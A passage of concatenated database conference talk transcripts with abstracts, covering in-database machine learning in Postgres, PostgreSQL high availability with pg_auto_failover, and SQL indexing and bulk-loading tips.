lot of digits, it has more false. If it's a shorter number, it's more true or something like that. So again, the number of truths and false is in the first 10 indicates how long it is. And the last one just indicates whether it's a zero at the end in this case. In this particular set of 10, we don't have any, but you get the idea. So what else do we need to do? As I told you before, we need to feed the training data in and we need to set the weights for the neurons. Right. Remember that. So what I've actually done here is I've created a function called generate weight, which effect, this is a multi-page function. These are the variable definitions. This is the body of the function. And what the body of the function does is to take the data you fed in, run through all the rows, and for each neuron in the row of tensors, we're going to spin through, we're going to set the weight of how important that particular neuron is to the result. This is kind of the crux of what's going on in AI. We're actually using the training data with supervised learning, because we know whether it has a zero or not. Okay. And we're setting the weights of the neurons based on how predictive that particular neuron is to producing a result that we want or a result that we don't want. Okay. Some neurons may be very unpredictable. Some neurons may be very predictive. You don't know, but that's what the training data is for. You set up the mechanism, you don't have to worry which neurons are useful. If the neuron is not useful, it won't affect the results. Important neurons will affect the results. And that's one of the beauties of AI and all. I'll talk about that later when I give the example of fraud detection, which is kind of interesting. We'll talk about that at the end. This is the rest of it, which basically sets the neuron weights and so forth for the tensors. Again, this is all in the SQL file you can download. Then we have a tensor mask, which has to identify whether the weights should apply to this particular real result data that comes in and return the weights where our neuron value matches the desired output. If it doesn't match the desired output, we don't care about. And then we have some internal work. We have to sum the weights. We have to do something called softmax. So the weights add up to 100% or one, technically. So you're looking at weights that have all sorts of different values. You want the total to be 100% or one so that they're all kind of relative to each other, how important are they? It doesn't matter what the actual weight is. It's how important is that weight to all the other weights that exist in the system, in that particular tensor. That's what we do here. Then we basically create a table called tensor weights true and tensor weights false, where we're loading the truth and the false into and setting the weights. Then we actually get some results out from the training data. So these are the actual weights that each of the neurons have gotten within the true tensor and the false tensor. You see they're kind of different, but you have different weights, depending on whether you're trying to be true or false. Now we're going to run actual examples. So we've done, we've set up our neurons. We've run through the training data. We've set our weights. Now what we're going to do is we're going to test the numbers. So I'm going to send 100 in and it would have run it through some weight and softmax and tensor mask and so forth. And what we end up with is something kind of lackluster. It predicts 22 percent chance it has a zero in there. Well, it obviously does have a zero in there, so it's pretty wrong. This is not a great example. Just because it is, that's that's AI. Some are right. Now if I go to 101, notice when I have a hundred, 22 percent that there's a zero in there. When I do 101, it drops to 11 percent. Why is that? That's because that last neuron was recording whether this was divisible by 10. Now we know as people, this is by 10, there's zero there, but system doesn't know that. It has to look at the training data and how predictive was that particular neuron compared to all the other neurons in predicting a zero. So you can see a small change between 100 and 101 in the sense that this last neuron was true in 100 and false in 101. A small example there. Then we pick a big number. This one also is wrong. It says there's a 68 percent chance down here that there's a zero in there. In fact, there's no zero in there at all. It is what it is. Now we're going to test a thousand values. So I'm going to generate a thousand values again, random number of digits. I'm going to run it through a common table expression, basically doing the softmax and the weights, set the weights for that. Then I'm going to analyze it to predict how accurate it was. I'm going to end up with this result. Now you can see here in black a whole bunch of the last couple rows that we came through. Six, this number, this number, and again predictions of how likely that was to have a zero or not, and then how accurate it was. What we get here at the bottom is a prediction of how accurate this particular example was. 72 percent roughly in accuracy. Not too bad. 15 percent accurate, or plus or minus, I think that would be the, if you just randomly did it. Again, this is not a super useful example, but the beauty of it is you can see how all those things came together. The creation of the neurons, the training set, the setting of the weights, and then kind of coming to a result that's not fantastic, but it's certainly better than random chance. Okay. So let's shift gears a little bit and let's get more specific about exactly how this is used in practice. Again, as I said before, nobody really would be doing what I'm doing. That's what I'm doing was a great illustrative example, but not something in real life. In most cases, you're going to use some type of client or server-side library to do artificial intelligence. Now, there are a number of popular ones, Madlib and Matlab, which are not the same, are very possible, popular. You've certainly heard of TensorFlow. Weka and Scikit, as I remember, are open source. I think also Madlib is one of them is. What's interesting is I have two URLs here. One is using Scikit at the server-side, which is what I did with PL-PURL, except you use PL-Python. That's kind of interesting. And then a client-side example of using Scikit as well. So again, you have all these options of what do I want, do I want a client-side, do I want a server-side. Probably you're going to do it in Python or a scripting language similar. And you see a lot. These are just very, very popular ways of doing AI. Another thing I mentioned earlier is the real benefit of GPUs. Again, if you're doing particularly deep learning where you've got thousands of tensors that have been feeding, thousands of tensors that may be going on for hundreds or thousands of stages, the ability to do parallel processing is incredibly useful. So again, tensors can have millions of neurons. Deep learning can have thousands of layers. And because you have to pass each neuron value to all the other ones in the next stage, there's a lot of repetitive calculations. So again, GPUs are very popular in this environment. So let's talk about some specific tasks that you see with machine learning. These are the common ones I've seen a lot. Chess is one that we used to have when I was a kid. You have sort of computers that could play chess. That is an interesting case, but it's a little easier for AI because it's a limited number of squares. There's a limited number of moves possible. So you can kind of force that a little easier. Jeopardy, which was done by IBM's Deep Blue, became very popular, although Deep Blue, in terms of actual user real-world application, has been somewhat of a disappointment. So that's kind of a cautionary tale. Words recognition is something you probably do on your smartphone all the time. Don't really need to think of it as AI, but it certainly is. Search recommendations certainly have an AI component to it. Video recommendations as well. Image detection, I talked about that. A lot of AI examples use video image detection. I'm not a big fan of that because it's very hard to see. Images have so many dots. How do you really understand how all those dots are processed? Because it's just sometimes computationally so big it's hard to really grasp. That's why I used a more simple example. Weather forecasting, that's a great one where you basically say, okay, we have this weather pattern, these weather conditions. Historically, what has happened when that weather condition has existed? What has happened next? You feed that data into the computer and then it's like, oh, okay, when 80% of the time when this happened, this weather pattern happens, the result is something, is a new weather pattern. You can kind of see how that would be used in artificial intelligence. Probably the most practical one that I've ever heard is fraud detection. Fraud detection for invalid financial transactions. Obviously, there's a great need here for financial institutions to have this ability. There's a URL there at the bottom by a US bank representative talking about how they use fraud detection. I found it very interesting. What I find really interesting about this picture slide is that if you were given the job of creating an AI machine for fraud detection, what things would you measure? What would your neurons measure? They may measure the charge amount. They may measure whether the transaction was with a magnetic stripe or a chip or a pin or an online charge. It may measure the vendor distance between the charging, the chargee's billing address and the vendor. It may be the distance from the last chargee transaction. It may be the country of the vendor. It may be the previous charges to this vendor from the chargee. It may be previous fraud charges from the vendor. Who knows? They all look reasonable to figure out fraud. But which ones are more important? What would the weights be? The beauty of AI is you may go to an expert and ask the expert, how important are all these things? Which is this twice as important as that one? Is this one not that important? And the expert may be able to give you rough numbers there. But the beauty of AI is you don't have to do that. You can basically, for fraud detection, choose your attributes. It may be the ones I mentioned or some other ones. You would create a machine learning neurons for each attribute away measuring each one. Then you create some training data from the previous fraudulent and non-fraudulent transactions. And you have attributes that match the neurons. And whether that transaction was valid or fraudulent. So you would probably feed in a whole bunch of valid transactions and a whole bunch of fraudulent transactions. Again, this is supervised learning. You're giving the results to the AI system so it can figure out how important those neurons are for detecting whether something's a fraud or not. Then you feed the data, training data into the machine to set the weights and based on how much the weights are, I predicts the validity of the fraudulent transaction. Then you start feeding real data in and you get your results. And then if you're doing reinforcement machine learning, you correct, in incorrect cases, you're now feeding some of your result data back into the machine learning to improve its predictability. So the beauty of that is you don't have to sort of get an expert, figure out exactly what is most important. You can kind of come from a distance and say, here are some things I think might are important. Let me feed a whole bunch of data in, let the computer figure out how important each of those are. And then again, feed your real data in to get results and use the results that come back when it's incorrect to reinforce, or whether it's correct actually, to reinforce those weights or make adjustments over time. So finally, we talked about machine learning, deep learning. I showed you a PL Pearl example. We talked about fraud detection and all these other things. I think one of the sort of questions in my mind is why would you use a database here? Like what value does a database bring here? A lot of machine learning is currently done in on custom platforms. It's sort of this thing that's sitting on the side of your data center because the technology is still changing and people are installing new software and there's a whole bunch of churn going on in a lot of ways. But ultimately, once the field kind of settles, you see this a lot in the database industry where something's external and eventually as it settles, it becomes part of the database itself. Machine learning needs a lot of data. And most of your data is already in your database, particularly for something like fraudulent transactions. Your data is already there. Why would you be downloading it to another system and then bringing it back again if you can do it in the database itself? Particularly, why do that? The advantages of doing the machine learning in the database are several of them. Certainly, you have previous activity as training data is all there. You have seamless access to that data because it's all kind of relationally set up. You can do things very creatively. For example, you could actually check a transaction for validity before you commit it. You can say, I'm about to commit this transaction. Let me go run it through the AI engine in the same database and see what the result is. And if the result says it has a high probability of being fraudulent, maybe I don't want to commit that transaction. That's kind of interesting. Of course, when AI is part of your system, it can benefit from database transactions, concurrency, backups, things like that. And there's a huge amount of data types, particularly in Postgres, where you have complex data types, full text search, GIS. GIS is a great example. Having GIS ability to know how far something is or where something is on the globe can be really useful. And of course, Postgres can do GPU things as well. So I want to thank you for listening today. I'm leaving you with an image, a real image, from Phoenix, Arizona. You can wonder why I chose that image, but I think there's some interesting sort of AI angles to that picture. So I hope you've learned a lot. Again, the slides are available on my website. If you'd like to download them or even download the SQL and run the demo yourself, I've enjoyed speaking to you today. And I'm looking forward to a really good conference. So thank you.
Artificial intelligence, machine learning, and deep learning are intertwined capabilities that attempt to solve problems that defy traditional computational solutions — problems include fraud detection, voice recognition, and search result recommendations. While they defy simple computation, they are computationally expensive, involving computation of perhaps millions of probabilities and weights. While these computations can be done outside of the database, there are specific advantages of doing machine learning inside the database, close to where the data is stored. This presentation explains how to do machine learning inside the Postgres database.
10.5446/53278 (DOI)
Hi and welcome to FOSDEM 2021. In the PostgreSQL developer room today we are talking about PostgreSQL architectures in production. I am Dimitri Fontaine and I have written a book named The Art of PostgreSQL. It's a book for application developers that you can find in a paperback form or that you can have online as an EPUB or PDF format of course. So this book is mainly for developers, application developers who want to be better at benefiting from PostgreSQL advanced SQL feature sets. And today in the context of FOSDEM I am offering a special discount code for them 2021. So use that in the checkout form on the website, theartofpostgreSQL.com for a 30% discount. Back to the main topic of today, PostgreSQL architectures in production. What does this title mean exactly? It's a pretty long phrase so let's zoom in and detail every word of this sentence. PostgreSQL architectures in production. The first word of course is PostgreSQL. The world's most advanced open source relational database. That's mouthful. What does it mean for your application as an application developer? The part in the stack of your application where you run PostgreSQL is going to solve an important problem for you. In a way that you don't have to think so much about it in the code you write to run your business, your application, your logic. And this problem is concurrency. You want a single data set managed in PostgreSQL in such a way that many concurrent transactions may happen at the same time in a way that your business guarantees are indeed guaranteed by the system by PostgreSQL. So what you solve with PostgreSQL in your stack that's concurrency. Now the second word in the phrase is architectures. So if you draw your stack as an application developer with the different components as they run in production as different services that connect to each other and if you draw the dependencies between the services that's what we call a production architecture. And in production means it's live now. In the image of a picture for the slide you can see a sport event being broadcasted on television on TV. For the broadcast to happen you need production engineers to actually be there at the console while the event is happening. In our job we are lucky enough that we don't need to be there at all time while customers are using our software. We can deploy it and it mostly works automatically. So the key for that to happen is availability. In our case because we are talking about PostgreSQL which is a database server we are talking about the availability of both the service and the data. And if you don't want to be at the console while the user can actually use your application you want high availability. So the availability can be measured in a number of seconds of done time per period of time usually per year. And if you make the ratio in between the interval of time when the service was available compared to when it was not then you have the famous 99.999% of availability. If you reach a certain threshold that should make sense depending on the application and the business you are working in. Well then you have high availability. To reach high availability if you're allowed like five minutes a year of done time in the case of failure of hardware component in production well what's next. If you only have five minutes a year to react to that you want as much as possible to be automated. So how do you automate a failover the process of going from one box that has failed now to another one to host both the PostgreSQL service and data online. Can you automate all of that and how much of it should you automate. When using PostgreSQL it is the classic PostgreSQL architecture that allows you to automate some of the things. Usually we use one primary and two stand-by's in a way that even if you lose a stand-by you know you still have two copies of the data at all time which means you can still accept transactions that are modifying the dataset writes in your application. Because the main issue is if you have no stand-by at all if you are left with one node the primary should you accept writes so you can either protect the data at this point and then you need to refuse the writes or you can protect the service and then you accept the writes but in case of the next failure well then you might lose data. So that's the rule trade-off that you need to decide with a database system that needs to handle availability of both the service and the data. So the next part of this presentation is going to focus on the tool that are provided for by PostgreSQL by core Postgres for you to implement failover. So included in Postgres to implement failover is streaming replication and streaming replication is provided in a way that it can be set up to be either synchronous or asynchronous. When we say that it's a sync synchronous we don't mean to say as in the real world sync would mean that two different events are happening at different places at exactly the same time they're in sync. It's not what it means we pretend it's sync because we wait until it happened in this other place. In the drawing there we have three nodes A, B and C. If A is the primary and you commit a transaction on A then A will wait until the transaction is known to have been committed on at least B or C at least one of them by default until it reports to the client connection that the commit has happened. That's what we mean with a sync. Sync means I'm happy to wait. That's all it means in PostgreSQL streaming replication. We don't have a magic wand to go faster than the speed of light. Speed of light is still a thing so we need to wait until the event could happen on another system. What's unique in PostgreSQL with this setting is that it applies per transaction. You can have on the same system in flight at the same time transactions that are going to wait and transactions that are going to not wait and be async asynchronous. You can even as in the slide there have a connection string with a special VIP user for the database that is always going to wait because it's only doing VIP transactions and you want to make sure those transactions made it to the other servers. Included in PostgreSQL to handle failover and high availability is also online streaming changes. You can register in PostgreSQL replication slots so that you make sure that the primary at all time keeps the data that is necessary for its secondaries to continue streaming. We also include in PostgreSQL tools such as PgBasbackup and PgRewind that are useful to set up and maintain stand-byes in a failover system. So you can have changes in roles and thanks to PgRewind you can grab the missing wall and make it back to follow the new primary when that happens. There is also the idea of fast forward and PostgreSQL by default includes cascading replication that allows a standby node to fetch the missing wall from another standby node. Also PostgreSQL includes online standby promotion which is the idea that when the standby is implementing read-on-lequeries at the time of the promotion from standby to primary those queries are left to continue. So there is no stop in the work stream on the standby. That's why it's called the hot standby and it's referred to also in this slide as online standby promotion. Including PostgreSQL also is the basics of point-in-time recovery. I say the basics because for point-in-time recovery to actually be useful to actually work to implement that you need an archive, an archive of both base backups and also wall files. The wall is the right head log and that's needed for recovery purposes and also for streaming replication. The archiving is a concept in the PostgreSQL implementation. You need to provide it separately. So please use an existing solution for handling archiving such as PgBackrest, WALL-E, WALL-G, PgBarman or maybe another of those open source solutions that are part of the ecosystem of PostgreSQL. Included in PostgreSQL is also ClientSideHA. On the client side in your application code when you connect to PostgreSQL and the failover happens, well your connection will break. The client will lose its connection and when connection is lost it's up to the client to realize and then connect again. What is provided for in PostgreSQL, what is included is a connection string facility that allows you to specify many hosts and then have LIPPQ so the client side that establishes the connection for you connect to this one node among the list that is currently the primary in a way that you can reuse the same connection string again when you lose the connection on the failover and it's to reconnect. The discovery of which node is currently the primary that's included in PostgreSQL. It's the target session attributes that you can see on the slide on the connection string there. Now some of the things that you need are not included in PostgreSQL. The first that I want to list is archiving. Archiving is a concept in PostgreSQL. It's not included directly in PostgreSQL core. Again use an existing open source software that implements archiving for you. I've listed them just previously. With archiving we implement bus backup and war archiving like I said before. Also not included in PostgreSQL is this idea that nodes will have a rule that changes over time. The currently primary node is going to be a secondary sometime and one of the secondaries after a failover is going to be a primary. That dynamic idea about rules, this idea that rules are dynamic is not included in PostgreSQL. Some other systems implement raft or paxos or other such algorithms that allow to have a dynamic rule in the system. That's not the case for PostgreSQL. Nothing included in PostgreSQL is configuration management, extension management and upgrades. Configuration management is the idea that if you change PostgreSQL.com for pghba.com for some other settings that way you need to take care of deploying this change to all the nodes because otherwise when you failover the changes you just made to the primary are not automatically available on the secondary yet. That's a separate tooling that you need to put in place. Extension management also is a little tricky because when you do create extension all the SQL objects are going to be replicated on the standby. The standby still needs to have the operating system interface, the.so, the shared library that is necessary for the extension. It needs to be installed both on the primary and the secondary servers and PostgreSQL on the secondary when it does create extension. It will not verify for you that the.so is there and available. That's an operating system integration job and PostgreSQL is not going to do it for you. It's not included. Also upgrades in the case of a multi-node system. You need to upgrade nodes separately and schedule them and schedule the restarts and the reconnection of the application yourself. That's the main thing about implementing failover with PostgreSQL. Now what if we want to automate entirely the operation of a failover? It's possible to do so. There are multiple tools allowing you to do that. I have worked on a tool named Pgauto Failover that I want to present today in this talk. The default first simple setup for Pgauto Failover is shown on the slide there. It consists of one primary, one secondary, and what we call the monitor node. The monitor is a third node that allows us to notice network splits and decide if one node is unavailable just because of network issues or completed down. So we can witness that and react correctly to network split situations thanks to the monitor. In this architecture with a single standby, you can implement automated failover. What you cannot provide with that architecture as we said before is both service and data availability. With this architecture you need to choose either you want to provide the service first, that's what we do, and in that case when you lose the secondary you still accept writes on the primary. Or you can implement data security, data availability, and then refuse your application to be able to write to the PostgreSQL server when the secondary is down. That's not what we do by default in that case. So it's not proper HA there, it's just failover capacity, but maybe that's what you need. So how do you make it happen? In Pgauto Failover we have a tool named Pgauto Ctl that is part of the package. So you Pgauto Ctl create the monitor and then twice in a row you create a PostgreSQL instance. The monitor is going to register the instance and decide if it's going to be a primary or secondary depending on the order in which you type the commands. Basically the first server is going to be initialized as a primary and the second one because the primary already exists is going to be initialized as a standby as a secondary node. In Pgauto Failover we named the secondary a node that way. The secondary is a standby that you can promote when the primary fails basically. So any node could be a standby but only those standby is ready for taking over, failing over from the primary or named a secondary. So when you have already one standby node, if you want to actually implement HA maybe you want a second standby node. So how do you make it happen? You just type the exact same command again Pgauto Ctl create PostgreSQL with the same set of arguments and it's going to register your third node on a third host or VM or a bare bone machine as you wish to the monitor and then give it the rule that you expect and everything is going to be set up for you. Sometimes you want to have three standby nodes so again same command and when we do that it sometimes it's because the third node is going to be a little different from the two previous nodes. It might sit on a zone that is a remote zone and it's there only for disaster recovery purposes. You never want to automatically fail over to that node, still you want it to maintain a copy of the data. So maybe you want node C in this diagram to not participate into the replication quorum and to never be a candidate for failover. So you want its candidate priority to be zero. The way to make that happen is either you knew that Pgauto Ctl create PostgreSQL time and then you run the command with the new arguments there that you can see on the slide. Replication quorum false and dash dash candidate priority zero or maybe you didn't know when you installed it the first time and then you can run the second part of the slide that the two commands Pgauto Ctl set node candidate priority or replication quorum. You can do that online and you can change your mind many times in the system while it's running in production and this is going to dynamically apply to your already running system. So included in PostgreSQL with Pgauto failover sorry so included in Pgauto failover same way as in PostgreSQL is streaming replication with replication slot. The thing that we do that is not default in PostgreSQL is maintain the replication slot understand by nodes themselves so that after a failover everything is smoothly reconnecting and just continuing from where it was. We include also an easy to set up SSL certificate set of facilities and we include the idea that the all the settings the replication settings are dynamic you can change them online with a very simple command. So included in Pgauto failover is also the idea that roles are dynamic. A node that is a primary is going to be a secondary if it fails and the node that is a secondary might become a primary later so those roles are dynamic in Pgauto failover. You can also use some of the commands presented in the slide to figure out the current properties of the system. Also included in Pgauto failover is online membership changes just like I said before when the node fails then something happens and then the membership changes from primary to secondary or secondary to primary things like that. We also include support for maintenance operation. A node that is ongoing maintenance cannot be a candidate for failover of course. So you can enable maintenance on a node do a kernel security upgrade for example and then when it's back online you can disable maintenance for this node to be a candidate for failover again when it's back to being ready for that. Included also in Pgauto failover is network split detection and protection thanks to the monitor being there in the architecture and thanks also to some smarts included in Pgauto CTL client itself. Pgauto CTL is going to manage the post-grasqual instance and also check out some network properties and make some decisions about the situation. You can even perform a promotion and target manually the node that you want to be the new primary which might be useful if you're migrating from some data center to another or if you change your current primary availability zone that's possible to do with a simple perform promotion command in Pgauto failover. Not included yet in Pgauto failover is archiving and disaster recovery setup. The idea is that in most of the existing archiving and disaster recovery solutions the idea that roles are dynamic is not implemented. There is a walkthrough in the tutorial or in the documentation to install the solution with a known current primary. It's hard to figure out what you should do when this primary is going to change and then to make it automatic. So that's why I think I believe that we should have something about that in Pgauto failover itself. And again configuration management, extension management etc. It's not today part of what Pgauto failover is going to do on your clusters in prediction. So that's it. That's the talk. That's my presentation today post-grasqual architectures in prediction. Feel free to ask me questions now and have a good day. Thank you.
When using PostgreSQL in production it is important to implement a strategy for High Availability. With a database service, the HA properties apply to both the service itself and of course to the data set. In this talk we learn how to think about specific HA needs of your production environment and how to achieve your requirements with Open Source tooling when it comes to your database of choice, PostgreSQL. In particular, we dive in many options that could be implemented for Postgres to evolve its offering from being a toolset to being “batteries included”. What does it mean in the context of HA? How to achieve it?
10.5446/53280 (DOI)
Hi, good morning. Thank you all for joining me today for my talk about some SQL tricks of an application DBA. My name is Khaki Benid. I'm a software developer and a team leader and I'm also a DBA and a pretty big fan of PostgreSQL. When I first started my career as a professional developer more than a decade ago, I was working for a very large organization and this organization had a lot of developers and DBAs. So many in fact that we had two distinct types of DBAs. We had the infrastructure DBA that would set up the database and configure storage replications backups and do the occasional instance of database tuning, basically anything that's related to the operating system. And we also had type of developer we called an application DBA. This DBA would work closely with the developers, sometimes even the customers and the management and it would be in charge of the schema design, things like tables, indexes and constraints. And he would do a lot of performance tuning and integration with tools like BI's and ETL processes, stored procedures and so on. So I was an application DBA most of my career and in this talk I want to share with you some of my, some of the tricks that I picked up along the way in my job as an application DBA. So I want to start with one of my favorite misconceptions that I hear a lot as a DBA and that indexes are like this magical thing that can make anything faster. So let's look at an example and use a user's table. That's I'm sure that most of you have some sort of table that looks like that might be called customers or employees. And you have an ID and email and a Boolean field called activated that is used to indicate if the account was activated. So if we look at the data we can see that we have 1 million users and 99% of them activated the account. That's pretty good. And at this point one might think, well, we usually work on the activated users. So we must have an index, right? So we create an index on the activated column of the user's table and go on with our day. And if we try to actually query for activated users, we might write a query like that. And we can see that the index is not used. The database decided to use a full table scan or a sequential scan on the user's table. If we try to query for a specific activated user, we can also see that the index is once again not being used. The database uses a sequential scan on the user's table. So what's going on? If we try to query for inactivated users, we can see that the index is being used. So this time the database decided to use the index. So the best way to try and understand why index is not always the best plan is to consider an extreme example. In our case, the table size is 65 megabytes and the index is 7 megabytes in size. So if you had to read the entire user's table, would you read the index as well? Probably not. I mean, why would you? Why read 72 megabytes when 65 is enough? Now, there are additional factors that make a full table scan faster by some degrees than reading a table through the index. But we put that aside for now and concentrate on this example. So you wouldn't use the index to scan to read the entire table, but what about 99%, which was our case? What about 80%, 50%, 40%? So there is a certain threshold after which it makes sense to use the index. So to decide if an index scan or full table scan is best, the database is using a statistic called frequency. We can see that statistic on our table by querying the table PG stats for the statistics on the table users and the column activated. We can see that after analyzing the table, Postgres found that the activated column contains two distinct values, true and false. Okay, that's true. We know that is true. And there's also an array of most common values. This would usually be the actual most common values, but in this case, we have only two values. So that's all the values. And for every value, Postgres is keeping track of the frequency. So Postgres knows that for the true, the active and true, there's 99% of the table. And the value false appear in less than 1%. Okay, so using this statistic Postgres knows how to decide whether a full table scan or an index scan is best. So your takeaway from this little section is that when you have columns with high frequency, you should probably avoid an index or be very cautious about just adding an index because it might not be used as you expect. So let's be actually realistic for a minute to say that we do need to query for inactivated users from time to time. Maybe we need to expire them. Maybe you want to send a reminder. So we already know that Postgres will not use the index to query activated users. So why index them in the first place? This is where partial index come in very, very handy. Partial index allows us to index only part of the table. In this case, we want to index only the inactivated users. We already know that activated users will not use the index. So might as well omit them and index only inactivated users. There's another slight difference here is because we are only indexing the inactivated users, we are indexing the ID column and not the actual activated column. So if we try to query for inactivated users, the index is being used. If we are trying to query for a specific inactive users, in this case, one, two, three, once again, the index is used. So that's great. Another benefit of partial index says is their size because we are only indexing the part of the table. The index is much smaller. In this case, you can see that the full index is seven megabytes in size and the partial index is only 230 kilobytes in size. That's a significant reduction in size. Now, I also included the size of the index without deduplication. I'm not going to get into that too much, but there's a new mechanism in Postgres 13 that makes the database useless space for indexes, B3 indexes with a lot of repeating values in the indexed field. So if you are using Postgres 13 with deduplication disabled, or if you're using Postgres versions prior to 13, the size you'll see is 21 megabytes, which makes the size reduction even more significant. So you should definitely consider using partial indexes where appropriate. Okay, so when people ask me what I do, and it's not always easy to explain what we do, especially for non-technical people, I often like to call myself a data plumber because I feel like I'm connecting pipes and moving data through the pipes. So a large, significant part of an application DBA role is to move data around, whether it's an ETL process or a botload, migrations, whatever, we are moving data around. So for our next demonstration, let's look at a sample schema of a commerce shop. It's pretty standard. You don't have to dig too much into it. We have a product table, a customer table, and a sale table with date of when the sale was made. And two foreign keys to the customer and the product. Now a common task you often need to do is normalize some fields, maybe do some large migrations on the data. In this case, we want to normalize the emails. We want to make it easier to query, and we want to make them predictable. So we want to make all the emails, make sure they are all lowercase. So this can actually be query that you would run as part of migration. It's not uncommon to see such queries. And you issue this query, you update the customer table, and you set the email to be lowercase email. You update it. You just update more than a million rows, and it took you just under two seconds. Now this type of query will, aside from taking like two seconds that might lock the table, it will also create a load. So I made a habit of always making sure that I'm only updating what needs updating. And this example over here, we really only need to update emails that are not already lowercase or mixed case. So if we add this predicate over here that excludes all the emails that are not already in lowercase, we update a lot less rows. And it's much faster. In fact, five times faster, and we created a lot less load. So remember, only update what needs update. This is very common in bulk updates and data migrations. And my personal favorite, those quick fixes in production where you just SSH for a second to update something because, I don't know why. So just remember that usually when you do a large update, you should definitely add a where clause somewhere. So let's continue with our example about bulk loads and talk about constraints. Constraints are an amazing feature of RDBMS. They are what sets us apart from all those key value and no SQL people. They keep the data consistent and reliable and we should use them. They are great. So here we are adding two foreign key constraints on the sale table. And we also add an index. This was pretty fast. It took 36 milliseconds. The table is empty. And now we can load some data into the table, into our sale table. We are loading 1 million rows. And it took us 15 and a half seconds to do that. Great, right? Now let's do it backwards. This time we are loading the data into the table. This takes just under three seconds. And then we add the constraints. Now, this time, adding the constraints took significantly longer. But overall, if we compare both processes, when we added the constraints and then loaded the data, it took 15 and a half seconds. When we loaded the data and then added the constraints, it took an overall less than three seconds. So this is six times faster. And you should consider that when you are loading a lot of information into a table. So as far as I know, in PostgreSQL, you can disable constraints or disable indexes. So what you usually need to do if you are operating on an existing table is to drop and recreate them. Other RDBMSs provide ways to disable constraints, especially for things like that. So let's once again look at loading data into the table. And once again, we load data into the sale table. This time we are loading only 100,000 rows. This is not a lot of data. And let's actually try to query this sale table for sales that were made in the first 10 days of May. We can see that the index we have on the field is being used. And the database did a bitmap index scan using the index. And it completed fairly fast. So are we satisfied? Is this enough? Can we call it the day? Can we go grab a coffee and be done with it? I think we can do better. Let's see how. To understand how we can do better, we need to mention another important statistics the database is using to determine what execution plan to use, what access method to use. And that's correlation. So correlation according to the documentation is the statistical correlation between physical ordering and logical ordering of the column values. To understand this, we're going to use these two illustrations. So on the left, you can see the index, which is always sorted. And these are the table blocks. So when the correlation is one, when we have perfect correlation, it means that consecutive values of the indexed value are stored physically in adjacent pages. So if this leaf here is one, it's in the leftmost block of the table. And the next value two is in the next block, two, two, and three, and four. It's perfectly sorted on this. When the correlation is close to zero, it means that consecutive values are scattered all across the table. They are not ordered nicely as we saw here when the correlation was one. Okay. So to intuitively be understand what correlation is, there are some data types, types of columns that have a natural high correlation. One example is other incrementing IDs, because when you generate IDs from a sequence, when you add new rows to the table, you append them at the end of the table, and they are incrementing automatically in an order. So naturally, they are sorted on disk. Time stamps that log when the row was created or modified also tend to be naturally correlated with the physical storage of the table. Okay. So we can actually inspect this statistics for our columns. And once again, from the PG stacks table. So we query for the correlation from the sale table for the ID and created columns. We can see that our auto incrementing ID field has perfect correlation, as we just described. And the creation date has very, very low correlation. It's very close to zero. This means that consecutive values of creation date are scattered all across the table. So to try and improve the correlation to see how it affects performance, we can load the data again into the table. But this time, we are going to load it, and we can see how it affects performance. We can execute the exact same query to find that sales from the first 10 days of May. And we can see that the data is sorted into the table. We can see that the data is sorted into the table. And we can see that the data is sorted into the table. We can execute the exact same query to find that sales from the first 10 days of May. And we can see two things. First, the execution plan is much simpler before we use the bitmap scan. And now we use and now the database decided to use an index scan. We can also see that the execution time is much faster, actually three times faster than before. And the reason for that is the correlation. Before, when the correlation was very low, the database looked at the correlation and we assumed that rows that are within this 10 first days of May are probably scattered all across the table. So we figured that it would be best to scan the index and find the pages where these values may be in and then read these pages and look for matching rows. When the correlation was perfect, the database figured that, well, it's most likely that a lot of these values are sitting very close to each other on the disk. Maybe even we have a few matching rows inside the same block. So it just iterates over the index and when you found the match, you read the block and it's very likely that the next value was in that block or the next one. So to compare, when we had low correlation, the access method was a bitmap index and it took three times, it was three times slower than the index scan and when the correlation was perfect. So when the takeaway here is that when you populate a table, you should think about how it's going to be used and perhaps sort the table in a way that can benefit the queries. Another way of sorting a table on disk if you already populated the table is using the cluster command. You should keep in mind that it's a blocking operation. It might affect the correlation of other columns in the table. I usually don't use cluster in production unless I know I can allow myself some downtime. So we can talk about correlation without mentioning one of my favorite types of index, which is the block range index. If you read the definition, it mentions a lot of the words that we overly mentioned, all the terms that we use to describe correlation from before. So brin is designed for handling very large tables where certain columns have natural correlation with their physical location within the table. So to understand how brin works, let's do an example. Let's say we have these values each in a single table page. So what brin does is that it first takes each three adjacent pages and groups them into a range and into a group. And then for each group, it keeps the range of the values inside this group. So one, two, three are the first group, four, five, six, and seven, eight, nine, or third group. And for each group, it keeps only the minimum and the maximum. So the first group contains values from one to three and so on. Let's try to use this index to find the value five. So the first range holds values from one to three. So five is definitely not here. No point in even looking at these blocks. And the second group holds a range of values between four and six. So five might be here. Notice that I didn't say definitely there. I said that it might be here. And finally, seven through nine, five is definitely not here. So using the index, we were able to minimize the search to just blocks four through six. So let's see how important is the correlation for the performance of a brand index. If we have the exact same data, but this time with a very low correlation, meaning the data is not sorted on this, we do the same. We group them into three groups of three adjacent blocks, and then keep the ranges for each one. And now let's try to use this index to find the value five like we did before. So this time, the index is useless. We can actually minimize the search at all because each of these ranges can contain the value five. So this is how correlation affects brand index. To create a brand index, you can use this using brand class of create index. And if you want to really experiment with brand index, I highly recommend looking at this storage parameter called pages per range. In our example, the pages per range was three because we grouped three adjacent blocks into a range. The default is 128. And this parameter actually impacts the performance of green very much. So you should experiment with different values. And for the best part of green indexes, they are very, very, very small. The corresponding bitrate on the same field would have been two megabytes in size, and the green is just 48 kilobytes. So we are almost done. I don't have much time left. I want to go through three more nice tips and quick tips for database development. So the first one is unlock tables. Postgres has a mechanism called while. It's the right ahead log. It's used to keep track of changes for integrity and to hold forward during recovery and for application. But it has a certain overhead. And there are situations where you can disable it to make things faster. One such scenario is what I like to call intermediate tables. Intermediate tables are the type of disposable tables that temporary tables that you create when you are implementing something else. This is very common in data warehouses where you load data from external sources into a staging area and then manipulate the data before you load it into the actual tables. So in this case, the intermediate tables in the staging area can benefit from being unlocked, meaning they will not be replicated. They will not be restored in case of disaster. But it will be a bit faster to work with. So you can use and unlock carefully, but you can gain slight speedups with unlock. Second one is what I like to call invisible indexes. Coming from Oracle, I add all sorts of features like type hints, sorry, optimizer hints, and a way to actually mark indexes as invisible. In Postgres, you don't have these features. So there are situations where I'm trying to play with an execution plan. I want to see what it might look like without a certain index. So one way to achieve that without actually dropping the index is doing so inside a transaction. This is using the fact that Postgres implements what's called transactional DDA. So you can start a transaction, drop the index, and the index is not really dropped until you commit the transaction. Then you issue 